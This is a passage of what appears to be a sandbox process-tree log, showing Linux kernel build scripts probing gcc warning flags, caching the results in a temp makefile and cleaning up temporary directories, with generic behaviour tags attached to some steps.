/bin/sh/bin/sh -c "echo '__cached_set_-e;_TMP_/tmp/a/.tmp___/tmp;_TMPO_/tmp/a/.tmp___/tmp.o;_mkdir_-p_/tmp/a/.tmp___;_trap_\"rm_-rf_/tmp/a/.tmp___\"_EXIT;_if___gcc_-Werror_-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Werror_return-type_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-mpreferred-stack-boundary_3_-mskip-rax-setup_-mtune_generic_-mno-red-zone_-mcmodel_kernel_-funit-at-a-time_-DCONFIG_X86_X32_ABI_-DCONFIG_AS_CFI_1_-DCONFIG_AS_CFI_SIGNAL_FRAME_1_-DCONFIG_AS_CFI_SECTIONS_1_-DCONFIG_AS_FXSAVEQ_1_-DCONFIG_AS_SSSE3_1_-DCONFIG_AS_CRC32_1_-DCONFIG_AS_AVX_1_-DCONFIG_AS_AVX2_1_-DCONFIG_AS_AVX512_1_-DCONFIG_AS_SHA1_NI_1_-DCONFIG_AS_SHA256_NI_1_-pipe_-Wno-sign-compare_-fno-asynchronous-unwind-tables_-mindirect-branch_thunk-extern_-mindirect-branch-register_-fno-jump-tables_-fno-delete-null-pointer-checks_-Wno-frame-address_-Wno-format-truncation_-Wno-format-overflow_-Wno-int-in-bool-context_-O2_--param_allow-store-data-races_0_-DCC_HAVE_ASM_GOTO_-Wframe-larger-than_1024_-fstack-protector-strong_-Wno-unused-but-set-variable_-Wno-unused-const-variable_-fno-omit-frame-pointer_-fno-optimize-sibling-calls_-fno-var-tracking-assignments_-pg_-mrecord-mcount_-mfentry_-DCC_USING_FENTRY_-Wdeclaration-after-statement_-Wpointer-sign_-c_-x_c_/dev/null_-o_\"_TMP\"__>/dev/null_2>&1;_then_echo_\"-Wno-pointer-sign\";_else_echo_\"\";_fi := -Wno-pointer-sign' >> /tmp/a/.cache.mk"3⤵PID:1994
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration -Werror=return-type -Wno-format-security -std=gnu89 -fno-PIE -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -funit-at-a-time -DCONFIG_X86_X32_ABI -DCONFIG_AS_CFI=1 -DCONFIG_AS_CFI_SIGNAL_FRAME=1 -DCONFIG_AS_CFI_SECTIONS=1 -DCONFIG_AS_FXSAVEQ=1 -DCONFIG_AS_SSSE3=1 -DCONFIG_AS_CRC32=1 -DCONFIG_AS_AVX=1 -DCONFIG_AS_AVX2=1 -DCONFIG_AS_AVX512=1 -DCONFIG_AS_SHA1_NI=1 -DCONFIG_AS_SHA256_NI=1 -pipe -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-int-in-bool-context -O2 --param=allow-store-data-races=0 -DCC_HAVE_ASM_GOTO -Wframe-larger-than=1024 -fstack-protector-strong -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY -Wdeclaration-after-statement -Wno-pointer-sign -Wstringop-truncation -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-Wno-stringop-truncation\"; else echo \"\"; fi"3⤵PID:1995
-
/bin/mkdirmkdir -p /tmp/a/.tmp_19954⤵PID:1996
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration "-Werror=return-type" -Wno-format-security "-std=gnu89" -fno-PIE -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -funit-at-a-time -DCONFIG_X86_X32_ABI "-DCONFIG_AS_CFI=1" "-DCONFIG_AS_CFI_SIGNAL_FRAME=1" "-DCONFIG_AS_CFI_SECTIONS=1" "-DCONFIG_AS_FXSAVEQ=1" "-DCONFIG_AS_SSSE3=1" "-DCONFIG_AS_CRC32=1" "-DCONFIG_AS_AVX=1" "-DCONFIG_AS_AVX2=1" "-DCONFIG_AS_AVX512=1" "-DCONFIG_AS_SHA1_NI=1" "-DCONFIG_AS_SHA256_NI=1" -pipe -Wno-sign-compare -fno-asynchronous-unwind-tables "-mindirect-branch=thunk-extern" -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-int-in-bool-context -O2 "--param=allow-store-data-races=0" -DCC_HAVE_ASM_GOTO "-Wframe-larger-than=1024" -fstack-protector-strong -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY -Wdeclaration-after-statement -Wno-pointer-sign -Wstringop-truncation -c -x c /dev/null -o /tmp/a/.tmp_1995/tmp4⤵PID:1997
-
/bin/rmrm -rf /tmp/a/.tmp_19954⤵PID:1998
-
/bin/sh/bin/sh -c "echo '__cached_set_-e;_TMP_/tmp/a/.tmp___/tmp;_TMPO_/tmp/a/.tmp___/tmp.o;_mkdir_-p_/tmp/a/.tmp___;_trap_\"rm_-rf_/tmp/a/.tmp___\"_EXIT;_if___gcc_-Werror_-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Werror_return-type_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-mpreferred-stack-boundary_3_-mskip-rax-setup_-mtune_generic_-mno-red-zone_-mcmodel_kernel_-funit-at-a-time_-DCONFIG_X86_X32_ABI_-DCONFIG_AS_CFI_1_-DCONFIG_AS_CFI_SIGNAL_FRAME_1_-DCONFIG_AS_CFI_SECTIONS_1_-DCONFIG_AS_FXSAVEQ_1_-DCONFIG_AS_SSSE3_1_-DCONFIG_AS_CRC32_1_-DCONFIG_AS_AVX_1_-DCONFIG_AS_AVX2_1_-DCONFIG_AS_AVX512_1_-DCONFIG_AS_SHA1_NI_1_-DCONFIG_AS_SHA256_NI_1_-pipe_-Wno-sign-compare_-fno-asynchronous-unwind-tables_-mindirect-branch_thunk-extern_-mindirect-branch-register_-fno-jump-tables_-fno-delete-null-pointer-checks_-Wno-frame-address_-Wno-format-truncation_-Wno-format-overflow_-Wno-int-in-bool-context_-O2_--param_allow-store-data-races_0_-DCC_HAVE_ASM_GOTO_-Wframe-larger-than_1024_-fstack-protector-strong_-Wno-unused-but-set-variable_-Wno-unused-const-variable_-fno-omit-frame-pointer_-fno-optimize-sibling-calls_-fno-var-tracking-assignments_-pg_-mrecord-mcount_-mfentry_-DCC_USING_FENTRY_-Wdeclaration-after-statement_-Wno-pointer-sign_-Wstringop-truncation_-c_-x_c_/dev/null_-o_\"_TMP\"__>/dev/null_2>&1;_then_echo_\"-Wno-stringop-truncation\";_else_echo_\"\";_fi := ' >> /tmp/a/.cache.mk"3⤵PID:1999
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration -Werror=return-type -Wno-format-security -std=gnu89 -fno-PIE -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -funit-at-a-time -DCONFIG_X86_X32_ABI -DCONFIG_AS_CFI=1 -DCONFIG_AS_CFI_SIGNAL_FRAME=1 -DCONFIG_AS_CFI_SECTIONS=1 -DCONFIG_AS_FXSAVEQ=1 -DCONFIG_AS_SSSE3=1 -DCONFIG_AS_CRC32=1 -DCONFIG_AS_AVX=1 -DCONFIG_AS_AVX2=1 -DCONFIG_AS_AVX512=1 -DCONFIG_AS_SHA1_NI=1 -DCONFIG_AS_SHA256_NI=1 -pipe -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-int-in-bool-context -O2 --param=allow-store-data-races=0 -DCC_HAVE_ASM_GOTO -Wframe-larger-than=1024 -fstack-protector-strong -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY -Wdeclaration-after-statement -Wno-pointer-sign -Wzero-length-bounds -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-Wno-zero-length-bounds\"; else echo \"\"; fi"3⤵PID:2000
-
/bin/mkdirmkdir -p /tmp/a/.tmp_20004⤵PID:2001
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration "-Werror=return-type" -Wno-format-security "-std=gnu89" -fno-PIE -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -funit-at-a-time -DCONFIG_X86_X32_ABI "-DCONFIG_AS_CFI=1" "-DCONFIG_AS_CFI_SIGNAL_FRAME=1" "-DCONFIG_AS_CFI_SECTIONS=1" "-DCONFIG_AS_FXSAVEQ=1" "-DCONFIG_AS_SSSE3=1" "-DCONFIG_AS_CRC32=1" "-DCONFIG_AS_AVX=1" "-DCONFIG_AS_AVX2=1" "-DCONFIG_AS_AVX512=1" "-DCONFIG_AS_SHA1_NI=1" "-DCONFIG_AS_SHA256_NI=1" -pipe -Wno-sign-compare -fno-asynchronous-unwind-tables "-mindirect-branch=thunk-extern" -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-int-in-bool-context -O2 "--param=allow-store-data-races=0" -DCC_HAVE_ASM_GOTO "-Wframe-larger-than=1024" -fstack-protector-strong -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY -Wdeclaration-after-statement -Wno-pointer-sign -Wzero-length-bounds -c -x c /dev/null -o /tmp/a/.tmp_2000/tmp4⤵PID:2002
-
/bin/rmrm -rf /tmp/a/.tmp_20004⤵PID:2003
-
/bin/sh/bin/sh -c "echo '__cached_set_-e;_TMP_/tmp/a/.tmp___/tmp;_TMPO_/tmp/a/.tmp___/tmp.o;_mkdir_-p_/tmp/a/.tmp___;_trap_\"rm_-rf_/tmp/a/.tmp___\"_EXIT;_if___gcc_-Werror_-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Werror_return-type_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-mpreferred-stack-boundary_3_-mskip-rax-setup_-mtune_generic_-mno-red-zone_-mcmodel_kernel_-funit-at-a-time_-DCONFIG_X86_X32_ABI_-DCONFIG_AS_CFI_1_-DCONFIG_AS_CFI_SIGNAL_FRAME_1_-DCONFIG_AS_CFI_SECTIONS_1_-DCONFIG_AS_FXSAVEQ_1_-DCONFIG_AS_SSSE3_1_-DCONFIG_AS_CRC32_1_-DCONFIG_AS_AVX_1_-DCONFIG_AS_AVX2_1_-DCONFIG_AS_AVX512_1_-DCONFIG_AS_SHA1_NI_1_-DCONFIG_AS_SHA256_NI_1_-pipe_-Wno-sign-compare_-fno-asynchronous-unwind-tables_-mindirect-branch_thunk-extern_-mindirect-branch-register_-fno-jump-tables_-fno-delete-null-pointer-checks_-Wno-frame-address_-Wno-format-truncation_-Wno-format-overflow_-Wno-int-in-bool-context_-O2_--param_allow-store-data-races_0_-DCC_HAVE_ASM_GOTO_-Wframe-larger-than_1024_-fstack-protector-strong_-Wno-unused-but-set-variable_-Wno-unused-const-variable_-fno-omit-frame-pointer_-fno-optimize-sibling-calls_-fno-var-tracking-assignments_-pg_-mrecord-mcount_-mfentry_-DCC_USING_FENTRY_-Wdeclaration-after-statement_-Wno-pointer-sign_-Wzero-length-bounds_-c_-x_c_/dev/null_-o_\"_TMP\"__>/dev/null_2>&1;_then_echo_\"-Wno-zero-length-bounds\";_else_echo_\"\";_fi := ' >> /tmp/a/.cache.mk"3⤵
- Writes file to tmp directory
PID:2004 -
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration -Werror=return-type -Wno-format-security -std=gnu89 -fno-PIE -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -funit-at-a-time -DCONFIG_X86_X32_ABI -DCONFIG_AS_CFI=1 -DCONFIG_AS_CFI_SIGNAL_FRAME=1 -DCONFIG_AS_CFI_SECTIONS=1 -DCONFIG_AS_FXSAVEQ=1 -DCONFIG_AS_SSSE3=1 -DCONFIG_AS_CRC32=1 -DCONFIG_AS_AVX=1 -DCONFIG_AS_AVX2=1 -DCONFIG_AS_AVX512=1 -DCONFIG_AS_SHA1_NI=1 -DCONFIG_AS_SHA256_NI=1 -pipe -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-int-in-bool-context -O2 --param=allow-store-data-races=0 -DCC_HAVE_ASM_GOTO -Wframe-larger-than=1024 -fstack-protector-strong -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY -Wdeclaration-after-statement -Wno-pointer-sign -Warray-bounds -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-Wno-array-bounds\"; else echo \"\"; fi"3⤵PID:2005
-
/bin/mkdirmkdir -p /tmp/a/.tmp_20054⤵PID:2006
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration "-Werror=return-type" -Wno-format-security "-std=gnu89" -fno-PIE -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -funit-at-a-time -DCONFIG_X86_X32_ABI "-DCONFIG_AS_CFI=1" "-DCONFIG_AS_CFI_SIGNAL_FRAME=1" "-DCONFIG_AS_CFI_SECTIONS=1" "-DCONFIG_AS_FXSAVEQ=1" "-DCONFIG_AS_SSSE3=1" "-DCONFIG_AS_CRC32=1" "-DCONFIG_AS_AVX=1" "-DCONFIG_AS_AVX2=1" "-DCONFIG_AS_AVX512=1" "-DCONFIG_AS_SHA1_NI=1" "-DCONFIG_AS_SHA256_NI=1" -pipe -Wno-sign-compare -fno-asynchronous-unwind-tables "-mindirect-branch=thunk-extern" -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-int-in-bool-context -O2 "--param=allow-store-data-races=0" -DCC_HAVE_ASM_GOTO "-Wframe-larger-than=1024" -fstack-protector-strong -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY -Wdeclaration-after-statement -Wno-pointer-sign -Warray-bounds -c -x c /dev/null -o /tmp/a/.tmp_2005/tmp4⤵PID:2007
-
/usr/lib/gcc/x86_64-linux-gnu/7/cc1/usr/lib/gcc/x86_64-linux-gnu/7/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ -D CONFIG_X86_X32_ABI -D "CONFIG_AS_CFI=1" -D "CONFIG_AS_CFI_SIGNAL_FRAME=1" -D "CONFIG_AS_CFI_SECTIONS=1" -D "CONFIG_AS_FXSAVEQ=1" -D "CONFIG_AS_SSSE3=1" -D "CONFIG_AS_CRC32=1" -D "CONFIG_AS_AVX=1" -D "CONFIG_AS_AVX2=1" -D "CONFIG_AS_AVX512=1" -D "CONFIG_AS_SHA1_NI=1" -D "CONFIG_AS_SHA256_NI=1" -D CC_HAVE_ASM_GOTO -D CC_USING_FENTRY /dev/null -quiet -dumpbase null -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" "-mindirect-branch=thunk-extern" -mindirect-branch-register -mrecord-mcount -mfentry "-march=x86-64" -auxbase-strip /tmp/a/.tmp_2005/tmp -O2 -Werror -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=return-type" -Wno-format-security -Wno-sign-compare -Wno-frame-address "-Wformat-truncation=0" "-Wformat-overflow=0" -Wno-int-in-bool-context "-Wframe-larger-than=1024" -Wno-unused-but-set-variable "-Wunused-const-variable=0" -Wdeclaration-after-statement -Wno-pointer-sign -Warray-bounds "-std=gnu90" -p -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-falign-jumps=1" "-falign-loops=1" -funit-at-a-time -fno-asynchronous-unwind-tables -fno-jump-tables -fno-delete-null-pointer-checks -fstack-protector-strong -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments --param "allow-store-data-races=0" -fstack-protector-strong -o -5⤵PID:2008
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_2005/tmp5⤵PID:2009
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_2005/tmp5⤵PID:2009
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_2005/tmp5⤵PID:2009
-
/usr/bin/asas --64 -o /tmp/a/.tmp_2005/tmp5⤵PID:2009
-
/bin/rmrm -rf /tmp/a/.tmp_20054⤵PID:2010
-
/bin/sh/bin/sh -c "echo '__cached_set_-e;_TMP_/tmp/a/.tmp___/tmp;_TMPO_/tmp/a/.tmp___/tmp.o;_mkdir_-p_/tmp/a/.tmp___;_trap_\"rm_-rf_/tmp/a/.tmp___\"_EXIT;_if___gcc_-Werror_-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Werror_return-type_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-mpreferred-stack-boundary_3_-mskip-rax-setup_-mtune_generic_-mno-red-zone_-mcmodel_kernel_-funit-at-a-time_-DCONFIG_X86_X32_ABI_-DCONFIG_AS_CFI_1_-DCONFIG_AS_CFI_SIGNAL_FRAME_1_-DCONFIG_AS_CFI_SECTIONS_1_-DCONFIG_AS_FXSAVEQ_1_-DCONFIG_AS_SSSE3_1_-DCONFIG_AS_CRC32_1_-DCONFIG_AS_AVX_1_-DCONFIG_AS_AVX2_1_-DCONFIG_AS_AVX512_1_-DCONFIG_AS_SHA1_NI_1_-DCONFIG_AS_SHA256_NI_1_-pipe_-Wno-sign-compare_-fno-asynchronous-unwind-tables_-mindirect-branch_thunk-extern_-mindirect-branch-register_-fno-jump-tables_-fno-delete-null-pointer-checks_-Wno-frame-address_-Wno-format-truncation_-Wno-format-overflow_-Wno-int-in-bool-context_-O2_--param_allow-store-data-races_0_-DCC_HAVE_ASM_GOTO_-Wframe-larger-than_1024_-fstack-protector-strong_-Wno-unused-but-set-variable_-Wno-unused-const-variable_-fno-omit-frame-pointer_-fno-optimize-sibling-calls_-fno-var-tracking-assignments_-pg_-mrecord-mcount_-mfentry_-DCC_USING_FENTRY_-Wdeclaration-after-statement_-Wno-pointer-sign_-Warray-bounds_-c_-x_c_/dev/null_-o_\"_TMP\"__>/dev/null_2>&1;_then_echo_\"-Wno-array-bounds\";_else_echo_\"\";_fi := -Wno-array-bounds' >> /tmp/a/.cache.mk"3⤵
- Command and Scripting Interpreter: Unix Shell
- Writes file to tmp directory
PID:2011 -
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration -Werror=return-type -Wno-format-security -std=gnu89 -fno-PIE -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -funit-at-a-time -DCONFIG_X86_X32_ABI -DCONFIG_AS_CFI=1 -DCONFIG_AS_CFI_SIGNAL_FRAME=1 -DCONFIG_AS_CFI_SECTIONS=1 -DCONFIG_AS_FXSAVEQ=1 -DCONFIG_AS_SSSE3=1 -DCONFIG_AS_CRC32=1 -DCONFIG_AS_AVX=1 -DCONFIG_AS_AVX2=1 -DCONFIG_AS_AVX512=1 -DCONFIG_AS_SHA1_NI=1 -DCONFIG_AS_SHA256_NI=1 -pipe -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-int-in-bool-context -O2 --param=allow-store-data-races=0 -DCC_HAVE_ASM_GOTO -Wframe-larger-than=1024 -fstack-protector-strong -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY -Wdeclaration-after-statement -Wno-pointer-sign -Wno-array-bounds -Wstringop-overflow -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-Wno-stringop-overflow\"; else echo \"\"; fi"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:2012 -
/bin/mkdirmkdir -p /tmp/a/.tmp_20124⤵PID:2013
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration "-Werror=return-type" -Wno-format-security "-std=gnu89" -fno-PIE -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -funit-at-a-time -DCONFIG_X86_X32_ABI "-DCONFIG_AS_CFI=1" "-DCONFIG_AS_CFI_SIGNAL_FRAME=1" "-DCONFIG_AS_CFI_SECTIONS=1" "-DCONFIG_AS_FXSAVEQ=1" "-DCONFIG_AS_SSSE3=1" "-DCONFIG_AS_CRC32=1" "-DCONFIG_AS_AVX=1" "-DCONFIG_AS_AVX2=1" "-DCONFIG_AS_AVX512=1" "-DCONFIG_AS_SHA1_NI=1" "-DCONFIG_AS_SHA256_NI=1" -pipe -Wno-sign-compare -fno-asynchronous-unwind-tables "-mindirect-branch=thunk-extern" -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-int-in-bool-context -O2 "--param=allow-store-data-races=0" -DCC_HAVE_ASM_GOTO "-Wframe-larger-than=1024" -fstack-protector-strong -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY -Wdeclaration-after-statement -Wno-pointer-sign -Wno-array-bounds -Wstringop-overflow -c -x c /dev/null -o /tmp/a/.tmp_2012/tmp4⤵PID:2014
-
/usr/lib/gcc/x86_64-linux-gnu/7/cc1/usr/lib/gcc/x86_64-linux-gnu/7/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ -D CONFIG_X86_X32_ABI -D "CONFIG_AS_CFI=1" -D "CONFIG_AS_CFI_SIGNAL_FRAME=1" -D "CONFIG_AS_CFI_SECTIONS=1" -D "CONFIG_AS_FXSAVEQ=1" -D "CONFIG_AS_SSSE3=1" -D "CONFIG_AS_CRC32=1" -D "CONFIG_AS_AVX=1" -D "CONFIG_AS_AVX2=1" -D "CONFIG_AS_AVX512=1" -D "CONFIG_AS_SHA1_NI=1" -D "CONFIG_AS_SHA256_NI=1" -D CC_HAVE_ASM_GOTO -D CC_USING_FENTRY /dev/null -quiet -dumpbase null -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" "-mindirect-branch=thunk-extern" -mindirect-branch-register -mrecord-mcount -mfentry "-march=x86-64" -auxbase-strip /tmp/a/.tmp_2012/tmp -O2 -Werror -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=return-type" -Wno-format-security -Wno-sign-compare -Wno-frame-address "-Wformat-truncation=0" "-Wformat-overflow=0" -Wno-int-in-bool-context "-Wframe-larger-than=1024" -Wno-unused-but-set-variable "-Wunused-const-variable=0" -Wdeclaration-after-statement -Wno-pointer-sign -Wno-array-bounds "-Wstringop-overflow=2" "-std=gnu90" -p -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-falign-jumps=1" "-falign-loops=1" -funit-at-a-time -fno-asynchronous-unwind-tables -fno-jump-tables -fno-delete-null-pointer-checks -fstack-protector-strong -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments --param "allow-store-data-races=0" -fstack-protector-strong -o -5⤵PID:2015
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_2012/tmp5⤵PID:2016
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_2012/tmp5⤵PID:2016
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_2012/tmp5⤵PID:2016
-
/usr/bin/asas --64 -o /tmp/a/.tmp_2012/tmp5⤵PID:2016
-
/bin/rmrm -rf /tmp/a/.tmp_20124⤵PID:2017
-
